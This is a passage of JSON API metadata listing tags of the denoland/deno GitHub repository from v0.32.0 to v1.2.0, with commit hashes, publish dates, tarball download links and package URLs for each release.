ste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/t